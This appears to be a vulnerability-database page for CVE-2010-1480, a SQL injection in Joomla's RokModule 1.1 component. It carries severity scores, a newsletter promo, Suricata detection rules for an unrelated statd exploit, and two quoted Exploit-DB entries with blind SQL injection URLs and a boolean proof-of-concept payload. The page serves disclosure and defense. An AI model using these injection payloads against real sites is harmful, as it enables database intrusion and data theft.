CVE-2010-1480
published 2010-04-19CVE-2010-1480: SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the module…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.96%
57.0th percentile
SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the module parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockettheme | com_rokmodule | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL RPC STATD UDP monitor mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD UDP monitor mon_name format string exploit attempt
GPL RPC STATD UDP monitor mon_name format string exploit attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP monitor mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 02|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101915; rev:10; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL RPC STATD TCP stat mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD TCP stat mon_name format string exploit attempt
GPL RPC STATD TCP stat mon_name format string exploit attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD TCP stat mon_name format string exploit attempt"; flow:established,to_server; content:"|00 01 86 B8|"; depth:4; offset:16; content:"|00 00 00 01|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101914; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC STATD TCP monitor mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD TCP monitor mon_name format string exploit attempt
GPL RPC STATD TCP monitor mon_name format string exploit attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD TCP monitor mon_name format string exploit attempt"; flow:established,to_server; content:"|00 01 86 B8|"; depth:4; offset:16; content:"|00 00 00 02|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101916; rev:11; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC STATD UDP stat mon_name format string exploit attempt
suricata·2010-09-23
CVE-2000-0666 GPL RPC STATD UDP stat mon_name format string exploit attempt
GPL RPC STATD UDP stat mon_name format string exploit attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP stat mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 01|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101913; rev:11; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
exploitdb·2012-09-10
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
---
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
Nombre del Componente: Com_rokmodule
Empresa: http://www.rockettheme.com/
Testeado: Linux Backtrack
Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux
Fecha: 09/09/2012
Bueno la Injeccion Va de la siguiente manera:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
Ok! Eso es todo Difrutenlo!
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados :D
Greetz: Dylan Irzi & WebSecurityDev
Exploit-DB
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
exploitdb·2010-04-11
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
---
[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
Software : com_rokmodule version 1.1
Vendor : http://www.rockettheme.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]
[o] PoC
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
[o] Greetz
No writeups or analysis indexed.
http://secunia.com/advisories/39255http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/downloadhttp://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-releasedhttp://secunia.com/advisories/39255http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/downloadhttp://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-released
2010-04-19
Published